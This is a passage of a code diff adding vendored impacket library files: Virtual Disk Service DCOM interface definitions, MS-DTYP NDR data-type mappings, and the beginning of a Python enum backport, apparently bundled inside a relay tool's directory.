+from impacket import hresult_errors
+from impacket.uuid import string_to_bin
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        if self.error_code in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[self.error_code][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[self.error_code][1] 
+            return 'VDS SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'VDS SessionError: unknown error code: 0x%x' % (self.error_code)
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 1.9 Standards Assignments
+CLSID_VirtualDiskService = string_to_bin('7D1933CB-86F6-4A98-8628-01BE94C9A575')
+IID_IEnumVdsObject = string_to_bin('118610B7-8D94-4030-B5B8-500889788E4E')
+IID_IVdsAdviseSink = string_to_bin('8326CD1D-CF59-4936-B786-5EFC08798E25')
+IID_IVdsAsync = string_to_bin('D5D23B6D-5A55-4492-9889-397A3C2D2DBC')
+IID_IVdsServiceInitialization = string_to_bin('4AFC3636-DB01-4052-80C3-03BBCB8D3C69')
+IID_IVdsService = string_to_bin('0818A8EF-9BA9-40D8-A6F9-E22833CC771E')
+IID_IVdsSwProvider = string_to_bin('9AA58360-CE33-4F92-B658-ED24B14425B8')
+IID_IVdsProvider = string_to_bin('10C5E575-7984-4E81-A56B-431F5F92AE42')
+
+error_status_t = ULONG
+
+# 2.2.1.1.3 VDS_OBJECT_ID
+VDS_OBJECT_ID = GUID
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.2.1.3.1 VDS_SERVICE_PROP
+class VDS_SERVICE_PROP(NDRSTRUCT):
+    structure = (
+        ('pwszVersion',LPWSTR),
+        ('ulFlags',ULONG),
+    )
+
+class OBJECT_ARRAY(NDRUniConformantVaryingArray):
+    item = PMInterfacePointer
+
+# 2.2.2.7.1.1 VDS_PROVIDER_TYPE
+class VDS_PROVIDER_TYPE(NDRENUM):
+    class enumItems(Enum):
+        VDS_PT_UNKNOWN     = 0
+        VDS_PT_SOFTWARE    = 1
+        VDS_PT_HARDWARE    = 2
+        VDS_PT_VIRTUALDISK = 3
+        VDS_PT_MAX         = 4
+
+# 2.2.2.7.2.1 VDS_PROVIDER_PROP
+class VDS_PROVIDER_PROP(NDRSTRUCT):
+    structure = (
+        ('id',VDS_OBJECT_ID),
+        ('pwszName',LPWSTR),
+        ('guidVersionId',GUID),
+        ('pwszVersion',LPWSTR),
+        ('type',VDS_PROVIDER_TYPE),
+        ('ulFlags',ULONG),
+        ('ulStripeSizeFlags',ULONG),
+        ('sRebuildPriority',SHORT),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+# 3.4.5.2.5.1 IVdsServiceInitialization::Initialize (Opnum 3)
+class IVdsServiceInitialization_Initialize(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('pwszMachineName', LPWSTR),
+    )
+
+class IVdsServiceInitialization_InitializeResponse(DCOMANSWER):
+    structure = (
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.4.5.2.4.1 IVdsService::IsServiceReady (Opnum 3)
+class IVdsService_IsServiceReady(DCOMCALL):
+    opnum = 3
+    structure = (
+    )
+
+class IVdsService_IsServiceReadyResponse(DCOMANSWER):
+    structure = (
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.4.5.2.4.2 IVdsService::WaitForServiceReady (Opnum 4)
+class IVdsService_WaitForServiceReady(DCOMCALL):
+    opnum = 4
+    structure = (
+    )
+
+class IVdsService_WaitForServiceReadyResponse(DCOMANSWER):
+    structure = (
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.4.5.2.4.3 IVdsService::GetProperties (Opnum 5)
+class IVdsService_GetProperties(DCOMCALL):
+    opnum = 5
+    structure = (
+    )
+
+class IVdsService_GetPropertiesResponse(DCOMANSWER):
+    structure = (
+       ('pServiceProp', VDS_SERVICE_PROP),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.4.5.2.4.4 IVdsService::QueryProviders (Opnum 6)
+class IVdsService_QueryProviders(DCOMCALL):
+    opnum = 6
+    structure = (
+        ('masks', DWORD),
+    )
+
+class IVdsService_QueryProvidersResponse(DCOMANSWER):
+    structure = (
+       ('ppEnum', PMInterfacePointer),
+       ('ErrorCode', error_status_t),
+    )
+
+# 3.1.1.1 IEnumVdsObject Interface
+# 3.4.5.2.1.1 IEnumVdsObject::Next (Opnum 3)
+class IEnumVdsObject_Next(DCOMCALL):
+    opnum = 3
+    structure = (
+       ('celt', ULONG),
+    )
+
+class IEnumVdsObject_NextResponse(DCOMANSWER):
+    structure = (
+       ('ppObjectArray', OBJECT_ARRAY),
+       ('pcFetched', ULONG),
+       ('ErrorCode', error_status_t),
+    )
+# 3.4.5.2.14.1 IVdsProvider::GetProperties (Opnum 3)
+class IVdsProvider_GetProperties(DCOMCALL):
+    opnum = 3
+    structure = (
+    )
+
+class IVdsProvider_GetPropertiesResponse(DCOMANSWER):
+    structure = (
+       ('pProviderProp', VDS_PROVIDER_PROP),
+       ('ErrorCode', error_status_t),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+}
+
+################################################################################
+# HELPER FUNCTIONS AND INTERFACES
+################################################################################
+class IEnumVdsObject(IRemUnknown2):
+    def Next(self, celt=0xffff):
+        request = IEnumVdsObject_Next()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['celt'] = celt
+        try:
+            resp = self.request(request, uuid = self.get_iPid())
+        except Exception as e:
+            resp = e.get_packet()
+            # If it is S_FALSE(1) means less items were returned
+            if resp['ErrorCode'] != 1:
+                raise
+        interfaces = list()
+        for interface in resp['ppObjectArray']:
+            interfaces.append(IRemUnknown2(INTERFACE(self.get_cinstance(), ''.join(interface['abData']), self.get_ipidRemUnknown(), target = self.get_target())))
+        return interfaces
+
+class IVdsProvider(IRemUnknown2):
+    def GetProperties(self):
+        request = IVdsProvider_GetProperties()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        resp = self.request(request, uuid = self.get_iPid())
+        return resp 
+
+class IVdsServiceInitialization(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+
+    def Initialize(self):
+        request = IVdsServiceInitialization_Initialize()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['pwszMachineName'] = '\x00'
+        resp = self.request(request, uuid = self.get_iPid())
+        return resp 
+
+class IVdsService(IRemUnknown2):
+    def __init__(self, interface):
+        IRemUnknown2.__init__(self, interface)
+
+    def IsServiceReady(self):
+        request = IVdsService_IsServiceReady()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        try:
+            resp = self.request(request, uuid = self.get_iPid())
+        except Exception as e:
+            resp = e.get_packet()
+        return resp 
+
+    def WaitForServiceReady(self):
+        request = IVdsService_WaitForServiceReady()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        resp = self.request(request, uuid = self.get_iPid())
+        return resp 
+
+    def GetProperties(self):
+        request = IVdsService_GetProperties()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        resp = self.request(request, uuid = self.get_iPid())
+        return resp 
+
+    def QueryProviders(self, masks):
+        request = IVdsService_QueryProviders()
+        request['ORPCthis'] = self.get_cinstance().get_ORPCthis()
+        request['ORPCthis']['flags'] = 0
+        request['masks'] = masks
+        resp = self.request(request, uuid = self.get_iPid())
+        return IEnumVdsObject(INTERFACE(self.get_cinstance(), ''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(), target = self.get_target()))

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/dtypes.py

@@ -0,0 +1,542 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-DTYP] Interface mini implementation
+#
+from __future__ import division
+from __future__ import print_function
+from struct import pack
+from six import binary_type
+
+from impacket.dcerpc.v5.ndr import NDRULONG, NDRUHYPER, NDRSHORT, NDRLONG, NDRPOINTER, NDRUniConformantArray, \
+    NDRUniFixedArray, NDR, NDRHYPER, NDRSMALL, NDRPOINTERNULL, NDRSTRUCT, \
+    NDRUSMALL, NDRBOOLEAN, NDRUSHORT, NDRFLOAT, NDRDOUBLEFLOAT, NULL
+
+DWORD = NDRULONG
+BOOL = NDRULONG
+UCHAR = NDRUSMALL
+SHORT = NDRSHORT
+NULL = NULL
+
+class LPDWORD(NDRPOINTER):
+    referent = (
+        ('Data', DWORD),
+    )
+
+class PSHORT(NDRPOINTER):
+    referent = (
+        ('Data', SHORT),
+    )
+
+class PBOOL(NDRPOINTER):
+    referent = (
+        ('Data', BOOL),
+    )
+
+class LPBYTE(NDRPOINTER):
+    referent = (
+        ('Data', NDRUniConformantArray),
+    )
+PBYTE = LPBYTE
+
+# 2.2.4 BOOLEAN
+BOOLEAN = NDRBOOLEAN
+
+# 2.2.6 BYTE
+BYTE = NDRUSMALL
+
+# 2.2.7 CHAR
+CHAR = NDRSMALL
+class PCHAR(NDRPOINTER):
+    referent = (
+        ('Data', CHAR),
+    )
+
+class WIDESTR(NDRUniFixedArray):
+    def getDataLen(self, data, offset=0):
+        return data.find(b'\x00\x00\x00', offset)+3-offset
+
+    def __setitem__(self, key, value):
+        if key == 'Data':
+            try:
+                self.fields[key] = value.encode('utf-16le')
+            except UnicodeDecodeError:
+                import sys
+                self.fields[key] = value.decode(sys.getfilesystemencoding()).encode('utf-16le')
+
+            self.data = None        # force recompute
+        else:
+            return NDR.__setitem__(self, key, value)
+
+    def __getitem__(self, key):
+        if key == 'Data':
+            return self.fields[key].decode('utf-16le')
+        else:
+            return NDR.__getitem__(self,key)
+
+class STR(NDRSTRUCT):
+    commonHdr = (
+        ('MaximumCount', '<L=len(Data)'),
+        ('Offset','<L=0'),
+        ('ActualCount','<L=len(Data)'),
+    )
+    commonHdr64 = (
+        ('MaximumCount', '<Q=len(Data)'),
+        ('Offset','<Q=0'),
+        ('ActualCount','<Q=len(Data)'),
+    )
+    structure = (
+        ('Data',':'),
+    )
+
+    def dump(self, msg = None, indent = 0):
+        if msg is None:
+            msg = self.__class__.__name__
+        if msg != '':
+            print("%s" % msg, end=' ')
+        # Here just print the data
+        print(" %r" % (self['Data']), end=' ')
+
+    def __setitem__(self, key, value):
+        if key == 'Data':
+            try:
+                if not isinstance(value, binary_type):
+                    self.fields[key] = value.encode('utf-8')
+                else:
+                    # if it is a binary type (str in Python 2, bytes in Python 3), then we assume it is a raw buffer
+                    self.fields[key] = value
+            except UnicodeDecodeError:
+                import sys
+                self.fields[key] = value.decode(sys.getfilesystemencoding()).encode('utf-8')
+            self.fields['MaximumCount'] = None
+            self.fields['ActualCount'] = None
+            self.data = None        # force recompute
+        else:
+            return NDR.__setitem__(self, key, value)
+
+    def __getitem__(self, key):
+        if key == 'Data':
+            try:
+                return self.fields[key].decode('utf-8')
+            except UnicodeDecodeError:
+                # if we could't decode it, we assume it is a raw buffer
+                return self.fields[key]
+        else:
+            return NDR.__getitem__(self,key)
+
+    def getDataLen(self, data, offset=0):
+        return self["ActualCount"]
+
+class LPSTR(NDRPOINTER):
+    referent = (
+        ('Data', STR),
+    )
+
+class WSTR(NDRSTRUCT):
+    commonHdr = (
+        ('MaximumCount', '<L=len(Data)//2'),
+        ('Offset','<L=0'),
+        ('ActualCount','<L=len(Data)//2'),
+    )
+    commonHdr64 = (
+        ('MaximumCount', '<Q=len(Data)//2'),
+        ('Offset','<Q=0'),
+        ('ActualCount','<Q=len(Data)//2'),
+    )
+    structure = (
+        ('Data',':'),
+    )
+
+    def dump(self, msg = None, indent = 0):
+        if msg is None:
+            msg = self.__class__.__name__
+        if msg != '':
+            print("%s" % msg, end=' ')
+        # Here just print the data
+        print(" %r" % (self['Data']), end=' ')
+
+    def getDataLen(self, data, offset=0):
+        return self["ActualCount"]*2 
+
+    def __setitem__(self, key, value):
+        if key == 'Data':
+            try:
+                self.fields[key] = value.encode('utf-16le')
+            except UnicodeDecodeError:
+                import sys
+                self.fields[key] = value.decode(sys.getfilesystemencoding()).encode('utf-16le')
+            self.fields['MaximumCount'] = None
+            self.fields['ActualCount'] = None
+            self.data = None        # force recompute
+        else:
+            return NDR.__setitem__(self, key, value)
+
+    def __getitem__(self, key):
+        if key == 'Data':
+            return self.fields[key].decode('utf-16le')
+        else:
+            return NDR.__getitem__(self,key)
+
+class LPWSTR(NDRPOINTER):
+    referent = (
+        ('Data', WSTR),
+    )
+
+# 2.2.5 BSTR
+BSTR = LPWSTR
+
+# 2.2.8 DOUBLE
+DOUBLE = NDRDOUBLEFLOAT
+class PDOUBLE(NDRPOINTER):
+    referent = (
+        ('Data', DOUBLE),
+    )
+
+# 2.2.15 FLOAT
+FLOAT = NDRFLOAT
+class PFLOAT(NDRPOINTER):
+    referent = (
+        ('Data', FLOAT),
+    )
+
+# 2.2.18 HRESULT
+HRESULT = NDRLONG
+class PHRESULT(NDRPOINTER):
+    referent = (
+        ('Data', HRESULT),
+    )
+
+# 2.2.19 INT
+INT = NDRLONG
+class PINT(NDRPOINTER):
+    referent = (
+        ('Data', INT),
+    )
+
+# 2.2.26 LMSTR
+LMSTR = LPWSTR
+
+# 2.2.27 LONG
+LONG = NDRLONG
+class LPLONG(NDRPOINTER):
+    referent = (
+        ('Data', LONG),
+    )
+
+PLONG = LPLONG
+
+# 2.2.28 LONGLONG
+LONGLONG = NDRHYPER
+
+class PLONGLONG(NDRPOINTER):
+    referent = (
+        ('Data', LONGLONG),
+    )
+
+# 2.2.31 LONG64
+LONG64 = NDRUHYPER
+class PLONG64(NDRPOINTER):
+    referent = (
+        ('Data', LONG64),
+    )
+
+# 2.2.32 LPCSTR
+LPCSTR = LPSTR
+
+# 2.2.36 NET_API_STATUS
+NET_API_STATUS = DWORD
+
+# 2.2.52 ULONG_PTR
+ULONG_PTR = NDRULONG
+# 2.2.10 DWORD_PTR
+DWORD_PTR = ULONG_PTR
+
+# 2.3.2 GUID and UUID
+class GUID(NDRSTRUCT):
+    structure = (
+        ('Data','16s=b""'),
+    )
+
+    def getAlignment(self):
+        return 4
+
+class PGUID(NDRPOINTER):
+    referent = (
+        ('Data', GUID),
+    )
+
+UUID = GUID
+PUUID = PGUID
+
+# 2.2.37 NTSTATUS
+NTSTATUS = DWORD
+
+# 2.2.45 UINT
+UINT = NDRULONG
+class PUINT(NDRPOINTER):
+    referent = (
+        ('Data', UINT),
+    )
+
+# 2.2.50 ULONG
+ULONG = NDRULONG
+class PULONG(NDRPOINTER):
+    referent = (
+        ('Data', ULONG),
+    )
+
+LPULONG = PULONG
+
+# 2.2.54 ULONGLONG
+ULONGLONG = NDRUHYPER
+class PULONGLONG(NDRPOINTER):
+    referent = (
+        ('Data', ULONGLONG),
+    )
+
+# 2.2.57 USHORT
+USHORT = NDRUSHORT
+class PUSHORT(NDRPOINTER):
+    referent = (
+        ('Data', USHORT),
+    )
+
+# 2.2.59 WCHAR
+WCHAR = WSTR
+PWCHAR = LPWSTR
+
+# 2.2.61 WORD
+WORD = NDRUSHORT
+class PWORD(NDRPOINTER):
+    referent = (
+        ('Data', WORD),
+    )
+LPWORD = PWORD
+
+# 2.3.1 FILETIME
+class FILETIME(NDRSTRUCT):
+    structure = (
+        ('dwLowDateTime', DWORD),
+        ('dwHighDateTime', LONG),
+    )
+
+class PFILETIME(NDRPOINTER):
+    referent = (
+        ('Data', FILETIME),
+    )
+
+# 2.3.3 LARGE_INTEGER
+LARGE_INTEGER = NDRHYPER
+class PLARGE_INTEGER(NDRPOINTER):
+    referent = (
+        ('Data', LARGE_INTEGER),
+    )
+
+# 2.3.5 LUID
+class LUID(NDRSTRUCT):
+    structure = (
+        ('LowPart', DWORD),
+        ('HighPart', LONG),
+    )
+
+# 2.3.8 RPC_UNICODE_STRING
+class RPC_UNICODE_STRING(NDRSTRUCT):
+    # Here we're doing some tricks to make this data type
+    # easier to use. It's exactly the same as defined. I changed the
+    # Buffer name for Data, so users can write directly to the datatype
+    # instead of writing to datatype['Buffer'].
+    # The drawback is you cannot directly access the Length and 
+    # MaximumLength fields. 
+    # If you really need it, you will need to do it this way:
+    # class TT(NDRCALL):
+    # structure = (
+    #     ('str1', RPC_UNICODE_STRING),
+    #  )
+    # 
+    # nn = TT()
+    # nn.fields['str1'].fields['MaximumLength'] = 30
+    structure = (
+        ('Length','<H=0'),
+        ('MaximumLength','<H=0'),
+        ('Data',LPWSTR),
+    )
+
+    def __setitem__(self, key, value):
+        if key == 'Data' and isinstance(value, NDR) is False:
+            try:
+                value.encode('utf-16le')
+            except UnicodeDecodeError:
+                import sys
+                value = value.decode(sys.getfilesystemencoding())
+            self['Length'] = len(value)*2
+            self['MaximumLength'] = len(value)*2
+        return NDRSTRUCT.__setitem__(self, key, value)
+
+    def dump(self, msg = None, indent = 0):
+        if msg is None:
+            msg = self.__class__.__name__
+        if msg != '':
+            print("%s" % msg, end=' ')
+
+        if isinstance(self.fields['Data'] , NDRPOINTERNULL):
+            print(" NULL", end=' ')
+        elif self.fields['Data']['ReferentID'] == 0:
+            print(" NULL", end=' ')
+        else:
+            return self.fields['Data'].dump('',indent)
+
+class PRPC_UNICODE_STRING(NDRPOINTER):
+    referent = (
+       ('Data', RPC_UNICODE_STRING ),
+    )
+
+# 2.3.9 OBJECT_TYPE_LIST
+ACCESS_MASK = DWORD
+class OBJECT_TYPE_LIST(NDRSTRUCT):
+    structure = (
+        ('Level', WORD),
+        ('Remaining',ACCESS_MASK),
+        ('ObjectType',PGUID),
+    )
+
+class POBJECT_TYPE_LIST(NDRPOINTER):
+    referent = (
+       ('Data', OBJECT_TYPE_LIST ),
+    )
+
+# 2.3.13 SYSTEMTIME
+class SYSTEMTIME(NDRSTRUCT):
+    structure = (
+        ('wYear', WORD),
+        ('wMonth', WORD),
+        ('wDayOfWeek', WORD),
+        ('wDay', WORD),
+        ('wHour', WORD),
+        ('wMinute', WORD),
+        ('wSecond', WORD),
+        ('wMilliseconds', WORD),
+    )
+
+class PSYSTEMTIME(NDRPOINTER):
+    referent = (
+       ('Data', SYSTEMTIME ),
+    )
+
+# 2.3.15 ULARGE_INTEGER
+class ULARGE_INTEGER(NDRSTRUCT):
+    structure = (
+        ('QuadPart', LONG64),
+    )
+
+class PULARGE_INTEGER(NDRPOINTER):
+    referent = (
+        ('Data', ULARGE_INTEGER),
+    )
+
+# 2.4.2.3 RPC_SID
+class DWORD_ARRAY(NDRUniConformantArray):
+    item = '<L'
+
+class RPC_SID_IDENTIFIER_AUTHORITY(NDRUniFixedArray):
+    align = 1
+    align64 = 1
+    def getDataLen(self, data, offset=0):
+        return 6
+
+class RPC_SID(NDRSTRUCT):
+    structure = (
+        ('Revision',NDRSMALL),
+        ('SubAuthorityCount',NDRSMALL),
+        ('IdentifierAuthority',RPC_SID_IDENTIFIER_AUTHORITY),
+        ('SubAuthority',DWORD_ARRAY),
+    )
+    def getData(self, soFar = 0):
+        self['SubAuthorityCount'] = len(self['SubAuthority'])
+        return NDRSTRUCT.getData(self, soFar)
+
+    def fromCanonical(self, canonical):
+        items = canonical.split('-')
+        self['Revision'] = int(items[1])
+        self['IdentifierAuthority'] = b'\x00\x00\x00\x00\x00' + pack('B',int(items[2]))
+        self['SubAuthorityCount'] = len(items) - 3
+        for i in range(self['SubAuthorityCount']):
+            self['SubAuthority'].append(int(items[i+3]))
+
+    def formatCanonical(self):
+        ans = 'S-%d-%d' % (self['Revision'], ord(self['IdentifierAuthority'][5:6]))
+        for i in range(self['SubAuthorityCount']):
+            ans += '-%d' % self['SubAuthority'][i]
+        return ans
+
+class PRPC_SID(NDRPOINTER):
+    referent = (
+        ('Data', RPC_SID),
+    )
+
+PSID = PRPC_SID
+
+# 2.4.3 ACCESS_MASK
+GENERIC_READ            = 0x80000000
+GENERIC_WRITE           = 0x40000000
+GENERIC_EXECUTE         = 0x20000000
+GENERIC_ALL             = 0x10000000
+MAXIMUM_ALLOWED         = 0x02000000
+ACCESS_SYSTEM_SECURITY  = 0x01000000
+SYNCHRONIZE             = 0x00100000
+WRITE_OWNER             = 0x00080000
+WRITE_DACL              = 0x00040000
+READ_CONTROL            = 0x00020000
+DELETE                  = 0x00010000
+
+# 2.4.5.1 ACL--RPC Representation
+class ACL(NDRSTRUCT):
+    structure = (
+        ('AclRevision',NDRSMALL),
+        ('Sbz1',NDRSMALL),
+        ('AclSize',NDRSHORT),
+        ('AceCount',NDRSHORT),
+        ('Sbz2',NDRSHORT),
+    )
+
+class PACL(NDRPOINTER):
+    referent = (
+        ('Data', ACL),
+    )
+
+# 2.4.6.1 SECURITY_DESCRIPTOR--RPC Representation
+class SECURITY_DESCRIPTOR(NDRSTRUCT):
+    structure = (
+        ('Revision',UCHAR),
+        ('Sbz1',UCHAR),
+        ('Control',USHORT),
+        ('Owner',PSID),
+        ('Group',PSID),
+        ('Sacl',PACL),
+        ('Dacl',PACL),
+    )
+
+# 2.4.7 SECURITY_INFORMATION
+OWNER_SECURITY_INFORMATION            = 0x00000001
+GROUP_SECURITY_INFORMATION            = 0x00000002
+DACL_SECURITY_INFORMATION             = 0x00000004
+SACL_SECURITY_INFORMATION             = 0x00000008
+LABEL_SECURITY_INFORMATION            = 0x00000010
+UNPROTECTED_SACL_SECURITY_INFORMATION = 0x10000000
+UNPROTECTED_DACL_SECURITY_INFORMATION = 0x20000000
+PROTECTED_SACL_SECURITY_INFORMATION   = 0x40000000
+PROTECTED_DACL_SECURITY_INFORMATION   = 0x80000000
+ATTRIBUTE_SECURITY_INFORMATION        = 0x00000020
+SCOPE_SECURITY_INFORMATION            = 0x00000040
+BACKUP_SECURITY_INFORMATION           = 0x00010000
+
+SECURITY_INFORMATION = DWORD
+class PSECURITY_INFORMATION(NDRPOINTER):
+    referent = (
+        ('Data', SECURITY_INFORMATION),
+    )

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/enum.py

@@ -0,0 +1,754 @@
+"""Python Enumerations"""
+
+import sys as _sys
+
+__all__ = ['Enum', 'IntEnum', 'unique']
+
+pyver = float('%s.%s' % _sys.version_info[:2])
+
+try:
+    any
+except NameError:
+    def any(iterable):
+        for element in iterable:
+            if element:
+                return True
+        return False
+
+
+class _RouteClassAttributeToGetattr(object):
+    """Route attribute access on a class to __getattr__.
+
+    This is a descriptor, used to define attributes that act differently when
+    accessed through an instance and through a class.  Instance access remains
+    normal, but access to an attribute through a class will be routed to the
+    class's __getattr__ method; this is done by raising AttributeError.
+
+    """
+    def __init__(self, fget=None):
+        self.fget = fget
+
+    def __get__(self, instance, ownerclass=None):
+        if instance is None:
+            raise AttributeError()
+        return self.fget(instance)
+
+    def __set__(self, instance, value):
+        raise AttributeError("can't set attribute")
+
+    def __delete__(self, instance):
+        raise AttributeError("can't delete attribute")
+
+
+def _is_descriptor(obj):
+    """Returns True if obj is a descriptor, False otherwise."""
+    return (
+            hasattr(obj, '__get__') or
+            hasattr(obj, '__set__') or
+            hasattr(obj, '__delete__'))
+
+
+def _is_dunder(name):
+    """Returns True if a __dunder__ name, False otherwise."""
+    return (name[:2] == name[-2:] == '__' and
+            name[2:3] != '_' and
+            name[-3:-2] != '_' and
+            len(name) > 4)
+
+
+def _is_sunder(name):
+    """Returns True if a _sunder_ name, False otherwise."""
+    return (name[0] == name[-1] == '_' and 
+            name[1:2] != '_' and
+            name[-2:-1] != '_' and
+            len(name) > 2)
+
+
+def _make_class_unpicklable(cls):
+    """Make the given class un-picklable."""
+    def _break_on_call_reduce(self):
+        raise TypeError('%r cannot be pickled' % self)
+    cls.__reduce__ = _break_on_call_reduce
+    cls.__module__ = '<unknown>'
+
+
+class _EnumDict(dict):
+    """Track enum member order and ensure member names are not reused.
+
+    EnumMeta will use the names found in self._member_names as the
+    enumeration member names.
+
+    """
+    def __init__(self):
+        super(_EnumDict, self).__init__()
+        self._member_names = []
+
+    def __setitem__(self, key, value):
+        """Changes anything not dundered or not a descriptor.
+
+        If a descriptor is added with the same name as an enum member, the name
+        is removed from _member_names (this may leave a hole in the numerical
+        sequence of values).
+
+        If an enum member name is used twice, an error is raised; duplicate
+        values are not checked for.
+
+        Single underscore (sunder) names are reserved.
+
+        Note:   in 3.x __order__ is simply discarded as a not necessary piece
+                leftover from 2.x
+
+        """
+        if pyver >= 3.0 and key == '__order__':
+                return
+        if _is_sunder(key):
+            raise ValueError('_names_ are reserved for future Enum use')
+        elif _is_dunder(key):
+            pass
+        elif key in self._member_names:
+            # descriptor overwriting an enum?
+            raise TypeError('Attempted to reuse key: %r' % key)
+        elif not _is_descriptor(value):
+            if key in self:
+                # enum overwriting a descriptor?
+                raise TypeError('Key already defined as: %r' % self[key])
+            self._member_names.append(key)
+        super(_EnumDict, self).__setitem__(key, value)
+
+
+# Dummy value for Enum as EnumMeta explicitly checks for it, but of course until
+# EnumMeta finishes running the first time the Enum class doesn't exist.  This
+# is also why there are checks in EnumMeta like `if Enum is not None`
+Enum = None
+
+
+class EnumMeta(type):
+    """Metaclass for Enum"""
+    @classmethod
+    def __prepare__(metacls, cls, bases):
+        return _EnumDict()
+
+    def __new__(metacls, cls, bases, classdict):
+        # an Enum class is final once enumeration items have been defined; it
+        # cannot be mixed with other types (int, float, etc.) if it has an
+        # inherited __new__ unless a new __new__ is defined (or the resulting
+        # class will fail).
+        if type(classdict) is dict:
+            original_dict = classdict
+            classdict = _EnumDict()
+            for k, v in original_dict.items():
+                classdict[k] = v
+
+        member_type, first_enum = metacls._get_mixins_(bases)
+        #if member_type is object:
+        #    use_args = False
+        #else:
+        #    use_args = True
+        __new__, save_new, use_args = metacls._find_new_(classdict, member_type,
+                                                        first_enum)
+        # save enum items into separate mapping so they don't get baked into
+        # the new class
+        members = dict((k, classdict[k]) for k in classdict._member_names)
+        for name in classdict._member_names:
+            del classdict[name]
+
+        # py2 support for definition order
+        __order__ = classdict.get('__order__')
+        if __order__ is None:
+            __order__ = classdict._member_names
+            if pyver < 3.0:
+                order_specified = False
+            else:
+                order_specified = True
+        else:
+            del classdict['__order__']
+            order_specified = True
+            if pyver < 3.0:
+                __order__ = __order__.replace(',', ' ').split()
+                aliases = [name for name in members if name not in __order__]
+                __order__ += aliases
+
+        # check for illegal enum names (any others?)
+        invalid_names = set(members) & set(['mro'])
+        if invalid_names:
+            raise ValueError('Invalid enum member name(s): %s' % (
+                ', '.join(invalid_names), ))
+
+        # create our new Enum type
+        enum_class = super(EnumMeta, metacls).__new__(metacls, cls, bases, classdict)
+        enum_class._member_names_ = []               # names in random order
+        enum_class._member_map_ = {}                 # name->value map
+        enum_class._member_type_ = member_type
+
+        # Reverse value->name map for hashable values.
+        enum_class._value2member_map_ = {}
+
+        # check for a __getnewargs__, and if not present sabotage
+        # pickling, since it won't work anyway
+        if (member_type is not object and
+            member_type.__dict__.get('__getnewargs__') is None
+            ):
+            _make_class_unpicklable(enum_class)
+
+        # instantiate them, checking for duplicates as we go
+        # we instantiate first instead of checking for duplicates first in case
+        # a custom __new__ is doing something funky with the values -- such as
+        # auto-numbering ;)
+        if __new__ is None:
+            __new__ = enum_class.__new__
+        for member_name in __order__:
+            value = members[member_name]
+            if not isinstance(value, tuple):
+                args = (value, )
+            else:
+                args = value
+            if member_type is tuple:   # special case for tuple enums
+                args = (args, )     # wrap it one more time
+            if not use_args or not args:
+                enum_member = __new__(enum_class)
+                if not hasattr(enum_member, '_value_'):
+                    enum_member._value_ = value
+            else:
+                enum_member = __new__(enum_class, *args)
+                if not hasattr(enum_member, '_value_'):
+                    enum_member._value_ = member_type(*args)
+            value = enum_member._value_
+            enum_member._name_ = member_name
+            enum_member.__objclass__ = enum_class
+            enum_member.__init__(*args)
+            # If another member with the same value was already defined, the
+            # new member becomes an alias to the existing one.
+            for name, canonical_member in enum_class._member_map_.items():
+                if canonical_member.value == enum_member._value_:
+                    enum_member = canonical_member
+                    break
+            else:
+                # Aliases don't appear in member names (only in __members__).
+                enum_class._member_names_.append(member_name)
+            enum_class._member_map_[member_name] = enum_member
+            try:
+                # This may fail if value is not hashable. We can't add the value
+                # to the map, and by-value lookups for this value will be
+                # linear.
+                enum_class._value2member_map_[value] = enum_member
+            except TypeError:
+                pass
+
+        # in Python2.x we cannot know definition order, so go with value order
+        # unless __order__ was specified in the class definition
+        if not order_specified:
+            enum_class._member_names_ = [
+                e[0] for e in sorted(
+                [(name, enum_class._member_map_[name]) for name in enum_class._member_names_],
+                 key=lambda t: t[1]._value_
+                        )]
+
+        # double check that repr and friends are not the mixin's or various
+        # things break (such as pickle)
+        if Enum is not None:
+            setattr(enum_class, '__getnewargs__', Enum.__getnewargs__)
+        for name in ('__repr__', '__str__', '__format__'):
+            class_method = getattr(enum_class, name)
+            obj_method = getattr(member_type, name, None)
+            enum_method = getattr(first_enum, name, None)
+            if obj_method is not None and obj_method is class_method:
+                setattr(enum_class, name, enum_method)
+
+        # method resolution and int's are not playing nice
+        # Python's less than 2.6 use __cmp__
+
+        if pyver < 2.6:
+
+            if issubclass(enum_class, int):
+                setattr(enum_class, '__cmp__', getattr(int, '__cmp__'))
+
+        elif pyver < 3.0:
+
+            if issubclass(enum_class, int):
+                for method in (
+                        '__le__',
+                        '__lt__',
+                        '__gt__',
+                        '__ge__',
+                        '__eq__',
+                        '__ne__',
+                        '__hash__',
+                        ):
